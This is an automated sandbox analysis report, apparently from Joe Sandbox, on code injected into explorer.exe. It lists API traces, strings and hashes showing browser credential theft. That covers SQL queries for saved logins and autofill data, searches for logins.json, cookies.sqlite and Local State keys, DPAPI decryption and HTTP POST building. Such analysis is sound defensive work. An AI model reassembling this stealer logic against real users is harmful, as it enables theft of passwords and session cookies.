RtlZeroMemory.NTDLL(?,00000040), ref: 00C331D7
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C332DF
DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00C3339C

Strings

0, xrefs: 00C33191
v1, xrefs: 00C3318A
SELECT origin_url,username_value,password_value FROM logins, xrefs: 00C33136
@, xrefs: 00C331F1

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
API String ID: 2757140130-4052020286
Opcode ID: e4dc8d39327909a7fe5bd26dd1d703327c6573c4456b6627ac801b08325eb6b5
Instruction ID: c8fe111f66432084b8ae30bc85e197be7c2fe5c93f0f4c5fddb803cb8d1f8430
Opcode Fuzzy Hash: e4dc8d39327909a7fe5bd26dd1d703327c6573c4456b6627ac801b08325eb6b5
Instruction Fuzzy Hash: C091D970218381AFD710EF64C884B2FBBE9AFC5744F08492CF895862A1DB31DE05CB66

Function 00C33ED9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 82
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C31000: GetProcessHeap.KERNEL32(00000008,?,00C311C7,?,?,00000001,00000000,?), ref: 00C31003
Part of subcall function 00C31000: RtlAllocateHeap.NTDLL(00000000), ref: 00C3100A

PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 00C33F0A
FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 00C33F16
lstrcmpiW.KERNEL32(?,00C862CC), ref: 00C33F38
lstrcmpiW.KERNEL32(?,00C862D0), ref: 00C33F4C
PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00C33F69
lstrcmpiW.KERNEL32(?,Local State), ref: 00C33F7E
PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00C33F9B
FindNextFileW.KERNELBASE(00000000,00000010), ref: 00C33FB5
FindClose.KERNELBASE(00000000), ref: 00C33FC4

Strings

Local State, xrefs: 00C33F78
*.*, xrefs: 00C33F01

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
String ID: *.*$Local State
API String ID: 3923353463-3324723383
Opcode ID: 877f10a9b3f2f28a4cbaec7bb86c6a46976d2739574890c70fb522d5e2ea46b4
Instruction ID: 1886774ecb6eb38bc2db90519fc707b279499318f46b9da94e1a9d0e98e24da0
Opcode Fuzzy Hash: 877f10a9b3f2f28a4cbaec7bb86c6a46976d2739574890c70fb522d5e2ea46b4
Instruction Fuzzy Hash: F521D0302103846FD714BBB0CC0CB6F76BC9F89355F440569F822C2192DB788A489769

Function 00C32B15 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 102
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C31953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00C32F0C), ref: 00C31973
Part of subcall function 00C31953: lstrlenW.KERNEL32(00C86564,?,?,00C32F0C), ref: 00C31978
Part of subcall function 00C31953: lstrcatW.KERNEL32(00000000,?,?,?,00C32F0C), ref: 00C31990
Part of subcall function 00C31953: lstrcatW.KERNEL32(00000000,00C86564,?,?,00C32F0C), ref: 00C31994

FindFirstFileW.KERNELBASE(00000000,?,00000000,00000000,?,00000000), ref: 00C32B3D
lstrcmpiW.KERNEL32(?,00C862CC), ref: 00C32B63
lstrcmpiW.KERNEL32(?,00C862D0), ref: 00C32B7B

Part of subcall function 00C319B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00C32CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00C319C4

StrStrIW.SHLWAPI(00000000,logins.json), ref: 00C32BE7
StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 00C32C16
FindNextFileW.KERNELBASE(00000000,00000010), ref: 00C32C43
FindClose.KERNELBASE(00000000), ref: 00C32C52

Strings

\*.*, xrefs: 00C32B15
cookies.sqlite, xrefs: 00C32C10
logins.json, xrefs: 00C32BE1

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
String ID: \*.*$cookies.sqlite$logins.json
API String ID: 1108783765-3717368146
Opcode ID: ffb76c61e7ea65dc3af180d254d31f7ca3a79a02db511299c66f71afbe11bea8
Instruction ID: 5bd93ea88c3eebc02adf5e5e9762643f2db46648456f7698e79bad65cf8e2bd9
Opcode Fuzzy Hash: ffb76c61e7ea65dc3af180d254d31f7ca3a79a02db511299c66f71afbe11bea8
Instruction Fuzzy Hash: 6F3170303243054F9F14BF719C99B3E679AAB88704F08493CBD56D6282EB79CE05A75A

Function 00C31D4A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 109
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C319B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00C32CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00C319C4

FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 00C31DA9
lstrcmpiW.KERNEL32(?,00C862CC), ref: 00C31DCF
lstrcmpiW.KERNEL32(?,00C862D0), ref: 00C31DE7
lstrcmpiW.KERNEL32(?,?), ref: 00C31E62

Part of subcall function 00C31CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,00C32C27), ref: 00C31D02
Part of subcall function 00C31CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 00C31D0D

FindNextFileW.KERNELBASE(00000000,00000010), ref: 00C31E94
FindClose.KERNELBASE(00000000), ref: 00C31EA3

Part of subcall function 00C31953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00C32F0C), ref: 00C31973
Part of subcall function 00C31953: lstrlenW.KERNEL32(00C86564,?,?,00C32F0C), ref: 00C31978
Part of subcall function 00C31953: lstrcatW.KERNEL32(00000000,?,?,?,00C32F0C), ref: 00C31990
Part of subcall function 00C31953: lstrcatW.KERNEL32(00000000,00C86564,?,?,00C32F0C), ref: 00C31994

Strings

\*.*, xrefs: 00C31D79
*.*, xrefs: 00C31D8B

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
String ID: *.*$\*.*
API String ID: 232625764-1692270452
Opcode ID: 522af5f339518bb5a172b36cc54bfd972d4756f35851e0238b01b457e4a8e8f4
Instruction ID: e8c785a03c4e3b40a69ba3d7b45d77a64185031699de6e3a287cd37e942f5fbe
Opcode Fuzzy Hash: 522af5f339518bb5a172b36cc54bfd972d4756f35851e0238b01b457e4a8e8f4
Instruction Fuzzy Hash: 1B31B2303143418FCB20AB708898B6F76E9AFC5740F084A29FC5682251EB36CE09A796

Function 00C33E04 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 75
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C31B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00C32893,00000000,00000000,00000000,?), ref: 00C31B82
Part of subcall function 00C31B6A: CloseHandle.KERNELBASE(00000000), ref: 00C31B8F

Part of subcall function 00C31C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00C33E1E,00000000,?,00C33FA8), ref: 00C31C46
Part of subcall function 00C31C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,00C33FA8), ref: 00C31C56
Part of subcall function 00C31C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,00C33FA8), ref: 00C31C76
Part of subcall function 00C31C31: CloseHandle.KERNELBASE(00000000,?,00C33FA8), ref: 00C31C91

Part of subcall function 00C32FB1: StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,00C33E30,00000000,00000000,?,00C33FA8), ref: 00C32FC1
Part of subcall function 00C32FB1: lstrlen.KERNEL32("encrypted_key":",?,00C33FA8), ref: 00C32FCE
Part of subcall function 00C32FB1: StrStrIA.SHLWAPI("encrypted_key":",00C8692C,?,00C33FA8), ref: 00C32FDD

Part of subcall function 00C3123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00C33E4B,00000000), ref: 00C3124A
Part of subcall function 00C3123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00C31268
Part of subcall function 00C3123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00C31295

RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 00C33E74
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C33E9E

Strings

DPAP, xrefs: 00C33E52
DPAP, xrefs: 00C33E5A
, xrefs: 00C33EA8
IDPAP, xrefs: 00C33E6E, 00C33E72

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
String ID: $DPAP$DPAP$IDPAP
API String ID: 3076719866-957854035
Opcode ID: ac48b3215144f3b74d2f5b46654029f4e08d54010eb223a29a0dccccf3653c58
Instruction ID: 5ff6e4a9cbc7f1a0b067d84fbd476e1bed1931895291c84c6695bbe4355eb788
Opcode Fuzzy Hash: ac48b3215144f3b74d2f5b46654029f4e08d54010eb223a29a0dccccf3653c58
Instruction Fuzzy Hash: E8218E72614385AFD725EA688C80A7FB2EDAB84701F48092EFC51C7241EB74CF498796

Function 00C34B92 Relevance: 3.0, APIs: 2, Instructions: 26nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00C31162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00C3116F

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00C34BB6
NtUnmapViewOfSection.NTDLL(000000FF), ref: 00C34BBF

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: MemoryMoveQuerySectionUnmapViewVirtual
String ID:
API String ID: 1675517319-0
Opcode ID: 9dbde3295ed9e6b6bbbf2a0a803a217f79ed7c2ca6a74159d70b1e3811040e18
Instruction ID: c2d816bc8e5cf865843f316fd5a41e169ae58e42d14355e747011944559e32d7
Opcode Fuzzy Hash: 9dbde3295ed9e6b6bbbf2a0a803a217f79ed7c2ca6a74159d70b1e3811040e18
Instruction Fuzzy Hash: 14E0DF31820610ABC65CBB70BC0DB8FBB989F96365F14C969B6A582090CB36D9409B64

Function 00C36512 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(00C920A4,00000001,00000000,0000000A,00C83127,00C328DA,00000000,?), ref: 00C3BFFC

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: ea0846dfd93bbc6da812b719bd4e642528e6975f895a8432e33eea7a5d4439cb
Instruction ID: 005e30aea32b9fdff725989c172c186b3625cb611895c4191a0c415c7d79b6e7
Opcode Fuzzy Hash: ea0846dfd93bbc6da812b719bd4e642528e6975f895a8432e33eea7a5d4439cb
Instruction Fuzzy Hash: ECE01A317A434135EE2037B96C0FF1A25554B85F00F64CA36BF10AA1CADF9586407127

Function 00C33C40 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 147
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C31B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00C32893,00000000,00000000,00000000,?), ref: 00C31B82
Part of subcall function 00C31B6A: CloseHandle.KERNELBASE(00000000), ref: 00C31B8F

Part of subcall function 00C31000: GetProcessHeap.KERNEL32(00000008,?,00C311C7,?,?,00000001,00000000,?), ref: 00C31003
Part of subcall function 00C31000: RtlAllocateHeap.NTDLL(00000000), ref: 00C3100A

GetTempPathW.KERNEL32(00000104,00000000), ref: 00C33C6A
GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00C33C76
DeleteFileW.KERNELBASE(00000000), ref: 00C33C7D
CopyFileW.KERNELBASE(?,00000000,00000000), ref: 00C33C89
lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 00C33D2F
lstrlen.KERNEL32(00000000), ref: 00C33D36
wsprintfA.USER32 ref: 00C33D55
lstrlen.KERNEL32(00000000), ref: 00C33D61
lstrcat.KERNEL32(00000000,?), ref: 00C33D89
lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00C33DB2
DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00C33DED

Strings

SELECT name,value FROM autofill, xrefs: 00C33CAA
AUTOFILL, xrefs: 00C33DBD, 00C33DC2, 00C33DCC
%s = %s, xrefs: 00C33D4F

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
API String ID: 2923052733-3488123210
Opcode ID: 5a441455b89735b82e2bfa9e54238fbbffe3ac13a5f82293cf79604704132a78
Instruction ID: 9eeb5f27b7cc23542144515f7aa3ff690183d249aa567de012779d2e569db720
Opcode Fuzzy Hash: 5a441455b89735b82e2bfa9e54238fbbffe3ac13a5f82293cf79604704132a78
Instruction Fuzzy Hash: 9E41C130224241AFD714BB70CC85E3F7AADEF85744F04082CF846A7252DB35DE029B6A

Function 00C328F8 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 158
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00C32AD2

Part of subcall function 00C31000: GetProcessHeap.KERNEL32(00000008,?,00C311C7,?,?,00000001,00000000,?), ref: 00C31003
Part of subcall function 00C31000: RtlAllocateHeap.NTDLL(00000000), ref: 00C3100A

lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 00C329E1
lstrlen.KERNEL32(00000000), ref: 00C329EC
wsprintfA.USER32 ref: 00C32A38
lstrlen.KERNEL32(00000000), ref: 00C32A44
lstrcat.KERNEL32(00000000,00000000), ref: 00C32A6C
lstrlen.KERNEL32(00000000,?,?), ref: 00C32A99

Strings

COOKIES, xrefs: 00C32AA4, 00C32AAB, 00C32AB1
TRUE, xrefs: 00C32A13
FALSE, xrefs: 00C32A06
%sTRUE%s%s%s%s%s, xrefs: 00C32A32

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
API String ID: 304071051-2605711689
Opcode ID: 5a0c81920e8ac41f202e8d6607b826a1bef7693e70762f100acb6e5610348589
Instruction ID: e860cff9c8fcb755bd4d651d5fd53bff04491d98624a9261f39e4a34a83f23a2
Opcode Fuzzy Hash: 5a0c81920e8ac41f202e8d6607b826a1bef7693e70762f100acb6e5610348589
Instruction Fuzzy Hash: 8751BD306183468FCB29EF64D890B3F77DAAF89704F08082DF8959B252DB35DD05AB56

Function 00C32CB5 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 112
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C31953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00C32F0C), ref: 00C31973
Part of subcall function 00C31953: lstrlenW.KERNEL32(00C86564,?,?,00C32F0C), ref: 00C31978
Part of subcall function 00C31953: lstrcatW.KERNEL32(00000000,?,?,?,00C32F0C), ref: 00C31990
Part of subcall function 00C31953: lstrcatW.KERNEL32(00000000,00C86564,?,?,00C32F0C), ref: 00C31994

Part of subcall function 00C31000: GetProcessHeap.KERNEL32(00000008,?,00C311C7,?,?,00000001,00000000,?), ref: 00C31003
Part of subcall function 00C31000: RtlAllocateHeap.NTDLL(00000000), ref: 00C3100A

Part of subcall function 00C31B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00C32893,00000000,00000000,00000000,?), ref: 00C31B82
Part of subcall function 00C31B6A: CloseHandle.KERNELBASE(00000000), ref: 00C31B8F

GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 00C32D13
StrStrIW.SHLWAPI(00000000,Profile), ref: 00C32D45
GetPrivateProfileStringW.KERNEL32(00000000,Path,00C8637C,?,00000FFF,?), ref: 00C32D68
GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 00C32D7B
lstrlenW.KERNEL32(00000000), ref: 00C32DD8

Strings

Profile, xrefs: 00C32D3F
Path, xrefs: 00C32D62
IsRelative, xrefs: 00C32D75
profiles.ini, xrefs: 00C32CCD

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
String ID: IsRelative$Path$Profile$profiles.ini
API String ID: 2234428054-4107377610
Opcode ID: a5763e75257a313cbe20120b71ec54f5e19828b522d61b258a75ae7588053b3b
Instruction ID: 3964bc4bd2e6c42832ea945eaeeab7f7e7f20708f86d5c43e628a428925a8c7e
Opcode Fuzzy Hash: a5763e75257a313cbe20120b71ec54f5e19828b522d61b258a75ae7588053b3b
Instruction Fuzzy Hash: 3C317A307243029FDA24BF30985172FB6A2AFC8710F14443DF956AB292DB758D46E796

Function 00C31333 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C31000: GetProcessHeap.KERNEL32(00000008,?,00C311C7,?,?,00000001,00000000,?), ref: 00C31003
Part of subcall function 00C31000: RtlAllocateHeap.NTDLL(00000000), ref: 00C3100A

Part of subcall function 00C3106C: lstrlen.KERNEL32(00D61326,00000000,00000000,00000000,00C31366,75568A60,00D61326,00000000), ref: 00C31074
Part of subcall function 00C3106C: MultiByteToWideChar.KERNEL32(00000000,00000000,00D61326,00000001,00000000,00000000), ref: 00C31086

Part of subcall function 00C312A3: RtlZeroMemory.NTDLL(?,00000018), ref: 00C312B5

RtlZeroMemory.NTDLL(?,0000003C), ref: 00C313C2
wsprintfW.USER32 ref: 00C314B5
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00C31594

Strings

Content-Type: application/x-www-form-urlencoded, xrefs: 00C314FB
POST, xrefs: 00C31465
Accept: */*Referer: %S, xrefs: 00C314AF

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
API String ID: 3833683434-704803497
Opcode ID: 7a7d97c17d9c0db4b2aaed966511ee031a956e66ab73ace347aa416cac7676f2
Instruction ID: 61d54f30ff544d8c4f46d82b09457191bbc11ec453dd6805b17fa989f4270d0e
Opcode Fuzzy Hash: 7a7d97c17d9c0db4b2aaed966511ee031a956e66ab73ace347aa416cac7676f2
Instruction Fuzzy Hash: 067168B0618305AFD7149F68DC88A2FBBE9EB88344F08492DF955D7252DB30DE048B96

Function 00C3B1E5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 174
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,00000006,00000000,?,?,00000000), ref: 00C3B31D
MapViewOfFile.KERNELBASE(?,?,00000000,?,?), ref: 00C3B34F

Strings

winShmMap1, xrefs: 00C3B278
winShmMap3, xrefs: 00C3B399
winShmMap2, xrefs: 00C3B2CF

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: File$CreateMappingView
String ID: winShmMap1$winShmMap2$winShmMap3
API String ID: 3452162329-3826999013
Opcode ID: bd10e0fa37e46130545fea4643786b6f079af7fcd0fad0b3f0a334d6a57e7823
Instruction ID: 49d911789605612dd423d850bd991f3f8292eb1cbe4c9ea6fb583087f672596f
Opcode Fuzzy Hash: bd10e0fa37e46130545fea4643786b6f079af7fcd0fad0b3f0a334d6a57e7823
Instruction Fuzzy Hash: E051BF71210701DFDB25DF18C845B2BB7E5FB84304F14892EEAA28B2A1DB70ED15CB51

Function 00C3A40E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.NTDLL(?,?,?), ref: 00C3A455
memcpy.NTDLL(?,?,?), ref: 00C3A479
ReadFile.KERNELBASE(?,?,?,?,?), ref: 00C3A4DB
memset.NTDLL ref: 00C3A546

Strings

winRead, xrefs: 00C3A515

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: memcpy$FileReadmemset
String ID: winRead
API String ID: 2051157613-2759563040
Opcode ID: 8874635e08dbd9311c94f7843a35affbc0d1bf91b2f99eaaf7bf5f0424038f00
Instruction ID: 904053e98978e966ca6bd992e2fe391d7475cfef3196b17f19cf651387f5ba0b
Opcode Fuzzy Hash: 8874635e08dbd9311c94f7843a35affbc0d1bf91b2f99eaaf7bf5f0424038f00
Instruction Fuzzy Hash: 5431CE72228300AFC740DE58CC8599FB7E6EFC4310F846928F89597210D6B0ED248B93

Function 00C32E30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIW.KERNELBASE(?,?), ref: 00C32E4B
RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 00C32EE4
RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00C32F54
RegCloseKey.KERNELBASE(?), ref: 00C32F62

Part of subcall function 00C319E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2,PortNumber,00000000,00000000), ref: 00C31A1E
Part of subcall function 00C319E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00C31A3C
Part of subcall function 00C319E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00C31A75
Part of subcall function 00C319E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2,PortNumber,00000000,00000000), ref: 00C31A98

Part of subcall function 00C31BC5: lstrlenW.KERNEL32(00000000,00000000,?,00C32E75,PathToExe,00000000,00000000), ref: 00C31BCC
Part of subcall function 00C31BC5: StrStrIW.SHLWAPI(00000000,.exe,?,00C32E75,PathToExe,00000000,00000000), ref: 00C31BF0
Part of subcall function 00C31BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,00C32E75,PathToExe,00000000,00000000), ref: 00C31C05
Part of subcall function 00C31BC5: lstrlenW.KERNEL32(00000000,?,00C32E75,PathToExe,00000000,00000000), ref: 00C31C1C

Part of subcall function 00C31AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,00C32E83,PathToExe,00000000,00000000), ref: 00C31B16

Strings

PathToExe, xrefs: 00C32E5E

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
String ID: PathToExe
API String ID: 1799103994-1982016430
Opcode ID: b2d162e315483110f2a6a34666caa43246e48d18a531c7a3322c64717736db50
Instruction ID: 97ba5d929a27a98921c948537841affc51acc9f5a70ceb94672b2de471b230c5
Opcode Fuzzy Hash: b2d162e315483110f2a6a34666caa43246e48d18a531c7a3322c64717736db50
Instruction Fuzzy Hash: 3E317E716143116F9B19AF21CC16D6F7AA9EFC8350F04452CFC6987281DA34CD05EBE6

Function 00C3A67C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_alldiv.NTDLL(?,?,?), ref: 00C3A6AD
_allmul.NTDLL(00000000,?,?), ref: 00C3A6B6
SetEndOfFile.KERNELBASE(?), ref: 00C3A6F3

Strings

winTruncate2, xrefs: 00C3A717
winTruncate1, xrefs: 00C3A6DF

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: File_alldiv_allmul
String ID: winTruncate1$winTruncate2
API String ID: 3568847005-470713972
Opcode ID: b233b954cc0258bf034c8228b8e7b52c57b405ef51b3617ac1e567f889db9567
Instruction ID: a384d4e552828f31b06d1137fbbf4d5b4f6175a406ddd2002a9a816328dfe398
Opcode Fuzzy Hash: b233b954cc0258bf034c8228b8e7b52c57b405ef51b3617ac1e567f889db9567
Instruction Fuzzy Hash: DE21D172221200ABCB149F2DCCC6E6B77B9EF85310F158169FD94DB295D635DC60CBA2

Function 00C34A71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C31000: GetProcessHeap.KERNEL32(00000008,?,00C311C7,?,?,00000001,00000000,?), ref: 00C31003
Part of subcall function 00C31000: RtlAllocateHeap.NTDLL(00000000), ref: 00C3100A

wsprintfW.USER32 ref: 00C34AA2
RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00C34AC7
RegCloseKey.KERNELBASE(?), ref: 00C34AD4

Strings

%s\%08x, xrefs: 00C34A9C
Software, xrefs: 00C34A95

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: Heap$AllocateCloseCreateProcesswsprintf
String ID: %s\%08x$Software
API String ID: 1800864259-1658101971
Opcode ID: f0da2cb21db12b6381db8946dffabb6d118e4e08eb27b6789d86b7a0b97ec927
Instruction ID: c75c6d67160e7e20b5116be92f457cff13d1214494e8ebaba1ab29705438bedb
Opcode Fuzzy Hash: f0da2cb21db12b6381db8946dffabb6d118e4e08eb27b6789d86b7a0b97ec927
Instruction Fuzzy Hash: A301F271610108BF9B189F94DC8AFBF77ADEB40358F40016EF905A3141EBB16E80A769

Function 00C34317 Relevance: 7.6, APIs: 5, Instructions: 64registryCOMMON

Download Yara Rule

APIs

_alloca_probe.NTDLL ref: 00C3431C
RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 00C34335
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00C34363
RegCloseKey.ADVAPI32(?), ref: 00C343C8

